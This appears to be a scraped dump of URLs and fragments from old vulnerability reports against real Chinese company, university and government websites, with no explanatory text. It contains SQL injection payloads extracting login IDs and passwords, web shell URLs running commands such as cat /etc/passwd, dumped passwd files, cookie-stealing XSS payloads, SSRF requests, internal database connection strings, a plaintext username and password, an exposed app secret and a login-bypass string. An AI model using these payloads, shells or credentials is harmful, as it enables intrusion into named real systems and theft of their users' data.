http://**.**.**.**/news2.aspx?id=276 http://tcoa.jf.faw.com.cn/names.nsf?Login http://wiki.spider.com.cn/ http://hk5.midea.com/add.php?cat=31&id=16&lang=1&lang_dir=c&line=594&pid=591 http://**.**.**.**:99/login/Login.jsp?logintype=1 http://**.**.**.**:99//pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:99//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager www.sto.cn http://**.**.**.** http://**.**.**.**/site/home/tyu/index-Marketing.php?Company_SN=17741&v=1 http://**.**.**.**/ http://**.**.**.**:7001/WebModule1/index.jsp http://**.**.**.**/ http://**.**.**.**:7001/console/ jdbc:oracle:thin:@**.**.**.**:1521:medicare http://weixin.uestcedu.com/weixin_get_user.do?jsoncallback=jsonp1451373897565&_=1451373898320&user_id=0291241&user_type=student&appkey=925003&appsecret=667a99fec582456a9197042e530b2224&ran=0.25382562211445914 http://n62.cnhubei.com/logic/?id=5 http://mihua.net/mihua.zip http://mail.huatu.com http://www.sinopharm-sd.com http://58.56.60.68:8009/websale/empLogin.aspx http://58.56.60.68:8088/yyoa/index.jsp http://58.56.60.68/lxcx/tc_ghs_login.asp http://58.56.60.68/EYJ/querychkrpt.aspx http://www.sinopharm-sd.com/News.aspx?smallclassid=1 http://www.sinopharm-sd.com/About.aspx?smallclassid=8 http://www.sinopharm-sd.com/Tel.aspx?smallclassid=5 http://www.sinopharm-sd.com/Contact.aspx?smallclassid=14 http://www.sinopharm-sd.com/Map.aspx?smallclassid=19 http://www.sinopharm-sd.com/Yingpin.aspx?ID=13 http://www.sinopharm-sd.com/MedicinePage.aspx?smallclassid=40 http://www.sinopharm-sd.com/ifxinxi.aspx?cityid=2 http://www.sinopharm-sd.com/News.aspx?smallclassid=1 http://m2.qiushibaike.com/article/list/image www.doyouhike.net http://www.doyouhike.net http://**.**.**.**/base/Login.aspx http://**.**.**.**:8080 http://www.doyouhike.net/route/go_add_base http://admin.doyouhike.net/index.php/file/index index.php/file/index 
http://**.**.**.**/site/news/title/detail.php?Company_SN=17741&Site_News_SN=3135&PHPSESSID=uvvs54til40602ha3e29qibqu2 http://**.**.**.**/site/news/title/detail.php?Company_SN=17741&Site_News_SN=3135%20and%20updatexml%281,concat%280x7e,user%28%29%29,1%29&PHPSESSID=uvvs54til40602ha3e29qibqu2 http://www.vinvest.com.cn/updatePwd.do http://android.myapp.com/myapp/detail.htm?apkName=com.kakao.topbroker http://corp.1disk.cn/show.aspx?filepath=1&type=1 http://kg.ouc.edu.cn/ http://kg.ouc.edu.cn/dproot/admin/login.php http://kg.ouc.edu.cn/dproot/ http://kg.ouc.edu.cn/dproot/_dpconf/sys_xml/table_my.config http://**.**.**.**/ http://202.108.145.58/default/ http://202.108.145.58/sso-server/she11.jsp?o=vLogin jdbc:oracle:thin:@172.16.1.13:1521:ntoptest http://172.16.1.12 http://172.16.1.13 http://172.16.1.84 http://172.16.1.37 http://172.16.1.94 http://172.16.1.66 http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://**.**.**.**/about/page.php?id=457 http://wooyun.org/bugs/wooyun-2015-0161215 http://121.8.153.27:8813 http://moa.gf.com.cn:8813 http://121.8.153.27:8813/11ss.jsp http://moa.gf.com.cn:8813/11ss.jsp http://a6.gykghn.com:8080/yyoa/checkWaitdo.jsp?userID=1 http://idc1.72e.net/register.aspx?t=2&v=sample%40email.tst&_=1451338589703 http://**.**.**.**/ http://epaper.**.**.**.**/html/2015-12/29/node_21.htm http://**.**.**.**/html/2015-12/29/node_21.htm http://**.**.**.**:7001/console http://**.**.**.**:7001/newsedit/ http://**.**.**.**:7001/newsedit/e5workspace/Login.jsp jdbc:sqlserver://**.**.**.**:1433 http://**.**.**.**:7001/tian/wooyun.jsp http://**.**.** http://www.gykgah.com/yyoa/ http://www.gykgah.com/yyoa/assess/js/initDataAssess.jsp http://**.**.**.**/product_list.php?i=1 http://ms.hujiang.com/api/ajaxDataHandler.ashx?callback=jsonp1&cateId=1&grade=0&lang=en&op=GetProgramCenterList&order=1&page=1&pageSize=10&searchKey=&t=0.4603204862214625&userID=0 
http://ms.hujiang.com/api/ajaxDataHandler.ashx?callback=jsonp1&cateId=1&grade=0&lang=en*&op=GetProgramCenterList&order=1&page=1&pageSize=10&searchKey=&t=0.4603204862214625&userID=0 http://vip.wissun.com https://pmos.md.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://baidu.com&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://qcdds.dongfeng-nissan.com/Data/DataUpLoad.aspx http://mindiao.cjn.cn:80/ http://**.**.**.**/aicuqcs/common/loginCheck_domain.jsp http://**.**.**.**/aicuqcs/common/ Format:Systime http://**.**.**.**/ http://www.jikexueyuan.com/course/ask?course_id=78&seq=1&page=1&per_page=50 http://www.jikexueyuan.com/course/ask?course_id=205&seq=1&page=1&per_page=100 http://www.fj.sgcc.com.cn/ https://222.185.235.2/ http://**.**.**.**:7008 http://**.**.**.**:7008 http://**.**.**.**:7070 http://enwcm.haier.com/ http://enwcm.haier.com/wcm/services/trswcm:SOAPService http://enwcm.haier.com/wcm/services/trswcm:SOAPService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="http://wcm.xasw.gov.cn/wcm/services/trswcm:SOAPService SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body SOAP-ENV:Envelope http://**.**.**.**/joomla/administrator/ http://**.**.**.**/joomla/administrator/language/en-GB/en-GB.xml http://**.**.**.**/exploiting-cve-2015-8562-new-joomla-rce-2/ http://sto.cn/admin11ww/zp.asp http://210.73.208.213:8080/login http://**.**.**.**/balist.cgi?page=23&Key= http://**.**.**.**:8080/cxxt/unit/loginunit.jsp http://202.104.30.160/ http://202.104.30.214:80/ http://202.104.30.248:80 http://202.104.30.248/uddiexplorer/she11.jsp?o=vLogin http://172.16.16.23 http://172.16.16.20 http://172.16.16.19 http://172.16.16.21 
http://172.16.16.29 http://**.**.**.**/yeNewsInfo.asp?id=133 http://**.**.**.**/ http://**.**.**.**:7001/she11.jsp?o=vLogin http://westsecu.21tb.com/login/login.logout.do http://support.daw.so/admin.php http://yingxiong.com/ http://support.daw.so/admin.php http://106.37.209.144/zlms/portal/sp/login.php http://106.37.209.144/zlms/portal/sp/login.php http://sqlmap.org http://116.236.239.108:7001/chinalife-web/Plan.xml http://116.236.239.108:7001/chinalife-web/she11.jsp?o=vLogin http://222.73.63.136/live_admin/application/singerShow/view/index.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin chanjet:x:500:500::/home/chanjet:/bin/bash cjzf_jjdz:x:501:501::/home/cjzf_jjdz:/bin/bash dz_citic:x:502:502::/home/cjzf_jjdz/dz_citic:/bin/bash dz_bosera:x:503:503::/home/cjzf_jjdz/dz_bosera:/bin/bash http://o.kekenet.com/kekecms/admin/index.php/home.d_hit?id=20607&catid=1414 
http://spcw.sinopharm.com/ http://oa.cnpic.com.cn/seeyon/index.jsp http://oa.cnpic.com.cn/seeyon/logs/login.log,发现无内容,但是可以bypass http://oa.cnpic.com.cn/seeyon//logs/login.log http://180.153.16.119:8180 http://180.153.16.119:8180/jmx-console https://meican.com/account/mobilelogin?mobileNumber= http://**.**.**.**:7001/ http://h5.anhuinews.com/index.php?a=view&c=scene&id=1&time=1451430169690 http://iss.digitalchina.com:8080/login.action http://client.cmge.com/admin/ http://old.uimaker.com/designer.php?zy=1 http://**.**.**.**/ http://**.**.**.**/2.jsp http://dag.cqupt.edu.cn:7001/PDE_PORTAL_V1.0.1/login.jsp cn:7001 http://**.**.**.**/admissions/news_detail.php?sid=5008&p_no=748 http://css.hisense.com/HXCSS/ http://59.41.46.167:8122 http://**.**.**.**/wa/wa/ma3.jsp https://180.169.5.227/ipp-payment-app/index.do?id=com.allinpay.cpg.IPaymentSaleService https://180.169.5.227/wooyun/wpp1.jsp http://**.**.**.**/chaxun.aspx?key=1 http://**.**.**.**/jianche.aspx?key=%27&page3=9643 http://**.**.**.**/news_1.php?p_no=396 http://**.**.**.**/ http://**.**.**.**/games_detail.php?cid=68 http://imgcache.qq.com/qqshow_v3/htdocs/live/yaohe/jumppage.html?url=data:text/html%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg== http://qz6666.com/1.html http://**.**.**.**/phpinfo.php/RK=0/RS=UyMNB5OeaW http://**.**.**.**/ccsh2010/index.php?menu=510&E1inc=12849&pageID1=1 http://mail.scdc.com.cn:3000 http://**.**.**.**/en/service21_details.php?id=39 http://**.**.**.**/table.php?m=03&y=2014 http://180.169.5.248/feedBackIssus/index https://mailsh.tct.tcl.com http://**.**.**.**/GuanLi/denglu.aspx https://101.200.31.23/user-login-Lw==.html https://182.92.26.65/user-login-Lw==.html http://202.96.191.219/tk/tx.jsp http://www.scrcoa.com http://www.dpartner.com.cn:8080/ http://www.buchang.com/zbt1jl/Admin/index.aspx http://www.buchang.com/zbt1jl/ http://**.**.**.**/ http://**.**.**.**/live_goodnews_new.htm http://**.**.**.**/search.php 
house.e23.cn/lp/pic_more.asp?contentid=2784&type=huxing* http://**.**.**.**:8002/SFP_ShareManage/ShareManagement http://www.1haolian.com/yhlnew/NewInfos.aspx?id=2617 http://www.1haolian.com/yhlnew/AppliancesDataAnalysis.aspx?type=ya&doctype=1&owntype=1 http://tvgo.1haolian.com/etvshop/ICanSupplyinfoManage.aspx?key=88952634&page=1 http://tvgo.1haolian.com/app/news/index.aspx?q=info&list=list&kwd= http://www.ihxlife.com/ http://**.**.**.**/wdxy/ http://**.**.**.**/PortalConsole/login.do http://**.**.**.**/PortalConsole/pages/UiasUser/findmypwd.do http://**.**.**.**:80/PortalConsole/pages/UiasUser/findpwdaction.do http://**.**.**.**/love000/mylist.asp https://store.b.qq.com/my/orders http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp这里随便输入一个帐号lili/888888,可以登陆成功,跳入修改密码界面,原始数据包: http://101.227.240.110:8989/wooyun.jsp http://116.228.55.80:8103/ http://116.228.55.80:8080/ http://**.**.**.** http://mail.faw.com.cn/ http://supplier.sinopec.com:9001 lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh supftp:/usr/bin/bsh http://**.**.**.** http://**.**.**.**:8080 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh admin:admin http://**.**.**.**/**.**.**.**.rar http://**.**.**.**/ http://**.**.**.**/content.php?view_group=1&view_type=165&view_mode=all http://**.**.**.**/content.php?id=269503 
http://**.**.**.**/promotion.php?id=54621 http://**.**.**.**/magazine.php?id=50880 http://**.**.**.**/epaper_po.php?id=936 http://**.**.**.**/ccm_content.php?id=19066 http://**.**.**.**/classic_content.php?id=33456 http://**.**.**.**/radio.php?id=254373 http://**.**.**.**/forum.php?change_model=forum_list&id=1 https://**.**.**.**:7021 http://**.**.**.**/ http://**.**.**.**/download_1_Corinthians.php http://**.**.**.**/downloadfile.php?file=./download/1_Corinthians/1_Corinthians01-01.mp3 http://**.**.**.**/downloadfile.php?file=xxxxx root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated 
SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash maintain:x:501:501::/home/maintain:/bin/bash reg:x:502:502::/home/reg:/bin/bash goodnews909:x:503:503::/home/goodnews909:/bin/bash dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin cyberoam:x:504:504::/home/cyberoam:/bin/bash cyberoam9:x:505:505::/home/cyberoam9:/bin/bash victor:x:506:506::/home/victor:/bin/bash phoebe:x:507:507::/home/phoebe:/bin/bash lionel:x:508:508::/home/lionel:/bin/bash service:x:509:509::/home/service:/bin/bash angel:x:510:510::/home/angel:/bin/bash monica:x:511:511::/home/monica:/bin/bash butyliu:x:512:512::/home/butyliu:/bin/bash linsenity514:x:513:513::/home/linsenity514:/bin/bash amyai:x:514:514::/home/amyai:/bin/bash watson:x:515:515::/home/watson:/bin/bash teresa:x:516:516::/home/teresa:/bin/bash sickfoot:x:517:517::/home/sickfoot:/bin/bash daisylau:x:518:518::/home/daisylau:/bin/bash karen:x:519:519::/home/karen:/bin/bash nancylee0618:x:520:520::/home/nancylee0618:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin admin:x:521:521::/home/admin:/bin/bash garytung:x:522:522::/home/garytung:/bin/bash http://**.**.**.** http://**.**.**.**/news_detail.asp?cat=52&sn=229 http://**.**.**.**/bugs/wooyun-2015-0136308提及的注入点http://**.**.**.**/news_detail.asp?cat=52&sn=229不是一个点 http://**.**.**.**/in http://**.**.**.**/web.rar http://www.chinanetwork.com.cn/w8/Event/GetOne?eventid=-1 http://**.**.**.**/ http://**.**.**.**/xtjp/login.do http://**.**.**.**/MyAgent/showcustom/view/common.action http://**.**.**.**/MyAgent/bak.jsp http://m.funguide.com.cn http://fcdt.800j.com.cn/index.php?m=content&c=index&a=typelist&catid=87&type=71|news|list&titlename=要闻观察 http://**.**.**.**/ http://**.**.**.**/about.aspx?cid=1 http://**.**.**.**/images/cssroot.jsp 
http://gxb.bnu.edu.cn/Index.php/Notice/shownot?nid=-37%20%20union%20select%201,user%28%29,database%28%29,4 http://oa.cnbg.com.cn/seeyon/ http://oa.cnbg.com.cn/seeyon//logs/login.log。需要通过两个斜杠//来绕过。 http://oa.cnmb.com.cn/seeyon/main.do http://www.melinked.com/requirement/14481950288762881.html https://**.**.**.**/login.action http://test2.suzhou.daojia.com.cn/combo_list.php?a=2 http://house.e23.cn/lp/list.asp?address=3137%20Laguna%20Street&diqu=1&image=&shangquan=&xuequ= http://a6.gykghn.com:8080/yyoa/ http://a6.gykghn.com:8080/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids= http://a6.gykghn.com:8080/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp http://**.**.**.**/cas/login?service=http://**.**.**.**/main/login.html http://**.**.**.**:8082/secure/Dashboard.jspa http://**.**.**.**:8082/secure/Signup!default.jspa http://**.**.**.**/daikuan/gjjcx.asp http://oa.sino-tcm.com/yyoa/index.jsp http://oa.sino-tcm.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://**.**.**.**:80/plan.do?method=getexpert&type=expert http://**.**.**.**/chemlab/App/ViewArticle.asp?ID=5176&CHID=38 http://222.73.243.130:9000/is/cmd.jsp?pwd=023&cmd=ifconfig http://wooyun.org/bugs/wooyun-2015-161842 http://**.**.**.**/site/product_classify/tyu/index.php?Product_Site_Classify_SN=47592&PHPSESSID=kujfceu4vc04oto2d9rr1ns8r7&Company_SN=17741 http://**.**.**.**/site/product_classify/tyu/index.php?Product_Site_Classify_SN=475921%20and%20updatexml%281,concat%280x7e,user%28%29%29,1%29&PHPSESSID=kujfceu4vc04oto2d9rr1ns8r7&Company_SN=17741 http://**.**.**.**/Default.aspx?course=yangqs&wno=1 http://**.**.**.**/eventcenter.php?tblname=news&id=71 http://**.**.**.**/articlelist.php?catid=1 http://**.**.**.**/zuoye/zuoye1303/login.asp http://oa.uc56.com http://oa.uc56.com/ucoa/sdkform/caigou/cgviewbill.aspx?workid=46295&fk_flow=180 http://oa.uc56.com/ucoa/sdkform/comm/flowfile.aspx?fk_flow=096&fk_node=9611&fid=0&workid=23527 
http://oa.uc56.com/ucoa/sdkform/gongcheng/gclx_bill.aspx?workid=43851&fk_flow=186 http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=&WorkID=54383&FK_Flow=123 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=41299&fk_flow=024 http://oa.uc56.com/UCOA/SDKForm/ShenQing/SQ_Form.aspx?WorkID=44769&FK_Flow=024 http://oa.uc56.com/UCOA/SDKForm/BaoXiao/ViewBill.aspx?WorkID=5891&FK_Flow=020 http://oa.uc56.com/ucoa/sdkform/caigou/cgviewbill.aspx?workid=46295&fk_flow=180 http://oa.uc56.com/ucoa/sdkform/gongcheng/gclx_bill.aspx?workid=43851&fk_flow=186 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=41299&fk_flow=024 http://oa.uc56.com/ucoa/sdkform/shenqing/sq_form.aspx?workid=26899&fk_flow=024 http://cms.php.administrator.cctvmall.com/ http://**.**.**.**/general/vmeet/upload/temp/fjhh.php http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/301/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250001/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250003/type/0 http://wx.sto.cn/Ali/index.php?s=/home/Main/to_editAddress/id/250004/type/0 http://202.98.11.126:85/login.jsp http://202.98.11.126:85/login.jsp http://202.98.11.126:80/login.jsp http://wooyun.org/bugs/wooyun-2010-0166177 http://113.106.76.91/ http://113.106.76.91/she11.jsp http://10.9.33.19 http://10.9.33.80 http://10.9.33.73 http://10.9.33.32 http://10.9.33.100 http://10.9.33.87 http://10.9.33.101 http://10.9.33.102 http://10.9.33.96 http://**.**.**.**/admin user:gongan006 pass:22048988 http://**.**.**.**/pro/list.php?cid=63 http://**.**.**.** http://**.**.**.**/news.php?id=44&mode=news_view http://**.**.**.**/schedule.php?mode=schedule_list&type=1 http://**.**.**.**/order.php?id=20&mode=order_post http://**.**.**.**/search.php?mode=search_list&keyword=2015&type=1&submit.x=10&submit.y=21 http://**.**.**.**/event.php?id=&mode=event_view http://**.**.**.**/program.php?mode=program_list&type=5 
http://**.**.**.**/program.php?id=373&mode=program_view http://**.**.**.**/blog/hans58351238/blog.php?id=23&mode=blog_view http://**.**.**.**/xiaoxuntong/ http://dm.72dns.com http://survey.wacom.com.cn/ pay.cmseasy.cn/0.rar http://58.56.60.68:8088/yyoa/checkWaitdo.jsp?userID=1 http://www.gk-nn.com/loadClickCount.ashx?NewsId=1 http://video.e23.cn/shipin/zt.shtm?ftzt=1&p=2 http://imo.cheyipai.com/Customize/Audit/MessageMonitor/groupSearch.php?id=35651&startTime=2015-12-01 http://imo.cheyipai.com/Customize/Audit/auditreport/Qgrouplist.php http://121.14.65.120:8080/cmd.jsp?pwd=023&cmd=ls%20-l http://121.14.65.120:8080/cmd.jsp?pwd=023&cmd=cat%20/etc/passwd http://imo.iflytek.com//Customize/Audit/auditreport/Qgrouplist.php http://**.**.**.**/search/index.do http://ysadmin.yszjdx.com/ http://m.chinaxinge.com/android/gsview.asp?id=2775518 http://m.chinaxinge.com http://www.ems.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.3.11.20:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://shipping.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://agent.ems.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.** http://wooyun.org/bugs/wooyun-2010-0165622 http://haoce.ztgame.com/view/user.html http://zhichi.ztgame.com:9000/login.html realauto.testin.cn/report.actionop=Overview.index&adaptId=e377ddfc1f47380fb59b876354932c41_ www.umeng.com/apps/f6280093a75c89df7c240045/reportsticket=ST-1409719124rdPYEek4GRdO9XwFPiZ_ www.jpush.cn/_ http://**.**.**/Project/ProjectInfo/20558_ http://www.zealer.com/data/cameraAnalysis?id= http://www.zealer.com/data/cameraSample?id= http://rdm.mobile.youku.com/signin/ http://202.98.11.47:7001/ http://10.44.30.89 http://10.44.30.35 http://10.44.30.52 http://10.44.30.91 http://10.44.30.51 http://10.44.30.113 http://10.44.30.118 http://10.44.30.54 http://10.44.30.90 http://10.44.30.128 http://10.44.30.79 
http://10.44.30.156 http://10.44.30.76 http://10.44.30.70 http://10.44.30.213 http://202.98.11.47:7001/uddiexplorer/jmxroot.jsp jdbc:oracle:thin:@10.44.31.36:1521/orcl http://**.**.**.**/contact/ http://122.225.53.6 http://**.**.**.**/szdwxs2.asp?id=81 http://webapp.cbs.baidu.com/rsstopic/gate?cbsonline=7&p=t&brand=top&rssadv=1&src=news.sina.cn/share.d.html?docID=fxmxxsp7274806#comment-hot-container http://webapp.cbs.baidu.com/rsstopic/gate?cbsonline=7&p=t&brand=top&rssadv=1&src=127.0.0.1:80 http://wooyun.org/bugs/wooyun-2010-0145236 http://mes.juneyaoair.com/mes/ http://a.paytend.com/admin/ http://**.**.**.** http://**.**.**.**/aksale/user/land.xhtml?username=D5C5CEC4B1A6 http://kf.bendibao.com/bus/zzcx.aspx?searchtype=fast&searchtype2=0&station1=1&station2=B http://**.**.**.**/ http://service.made-in-china.com:80/ http://service.made-in-china.com/service/successful-story-1.html http://life.scu.edu.cn/webContent.asp?id=1223&type=news http://**.**.**.**/Services/system/index.asp http://219.143.213.46:7002/bea_wls_internal/she11.jsp?o=index jdbc:oracle:thin:@10.1.126.78:1521:wmdb http://spam.vipabc.com/snspam/homepage.asp http://120.35.11.139:82 http://**.**.**.**/manage/Login.aspx http://**.**.**.** http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1 http://qz6666.com/2.html mat1.gtimg.com/app/openjs/openjs.js#autoboot=no&debug=yes http://my.bendibao.com/map/api.php?action=geturl&s1=e&s2=e http://**.**.**.**/cn/minipage/CorBankDemo/AdminWeb/main/crm/operatorManage/Add/index.html http://125.93.53.81/manager/html?org.apache.catalina.filters.CSRF_NONCE=EB06D451164A29D32E37E008F30E8BCE http://shop.100msh.com/search/ajax_get_partner_info?partner_ids_str=1 http://**.**.**/portal/ http://www.youxinpai.com/contactus_us/ http://**.**.**.** https://**.**.**.**/spp-cpp-web/cpp/aboutUs.action https://**.**.**.**/spp-cpp-web/bak.jsp 
http://**.**.**.**/newsdetailhtml.php?data_no=1637 http://**.**.**.**/ http://**.**.**.** http://chat.meilele.com/solr/#/ http://**.**.**/admin/test.jsp密码123_ http://**.**.**.** http://ehr.tsingtao.com.cn:7001/ehr/login.do http://report2015.xiaojukeji.com/report?phone=18888888888 http://multimedia.ecnu.edu.cn/ http://testcmbc.58v5.cn/manager/ http://bangzhu.feidee.com/ http://www.scyd360.com/help.php?mod=list&cateid=4 http://**.**.**.**/crcshopweb/web/content_page.php?lang=2&id=7 http://www.csimc.com.cn/ http://a8.csimc.com.cn/seeyon//logs/login.log http://202.115.194.53:2222/?CardType=CampusExamCard&examID=1439&examCode=2014110308 http://**.**.**.**/szxq.rar http://fx.cmge.com/admin/ http://www.easemob.com/.git/index http://ttx5.yingxiong.com/m/list.html?cid=* site:tangscan.com http://tangscan.com/auth/p8SY0%252B8RdM3f8BvcwAIbsoEnFRi75%252BY%252Feq6tfDCeIoOpPKu38prY http://tangscan.com/auth/p8SY1OgWdM%2FUph3fwAIa5IclFh%2B75bdnJ%2Fn7LWvJJN%2F5OPvmpJna http://www.tangscan.com/auth/p8Gb1OoWdMOJ80eIxwRKsoMjRhntueVmIKGscGmZcoL6Pa7k9cmI http://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://**.**.**.**/do_with/wcm/dzhd/dzhd.jsp?shijian=&shouzhong=&leixing=&didian=63*&xilie=&zhujiang= http://tte.whut.edu.cn/admin/show.php?dno=65 http://tte.whut.edu.cn/admin/show.php?dno=65 http://www.dfcv.com.cn/ModelPages/MarketActivity/MarketActivity.aspx?ColumnCode=HD20141204001 http://**.**.**.**/ index.php/welcome/login http://www.flyertea.com/live.php http://**.**.**.**/ http://m.flyertrip.com/Admin/orders/all http://estore.wacom.com.cn/userCenter/ReceiveAddress.aspx http://www.chunbo.com/helpcenter/index/content_id/56 http://www.dfcv.com.cn/ModelPages/MarketActivity/MAPhotoDetail.aspx?ColumnCode=HD20141204001&id=61 http://116.236.252.101:20021/ http://116.236.252.101:20021/zecmd/zecmd.jsp http://116.236.252.101:20142/scheduler/displaTasks.do?method=displayTasks http://116.236.252.101:20022/zecmd/zecmd.jsp username:admin'or'1'='1 pwd:123456 
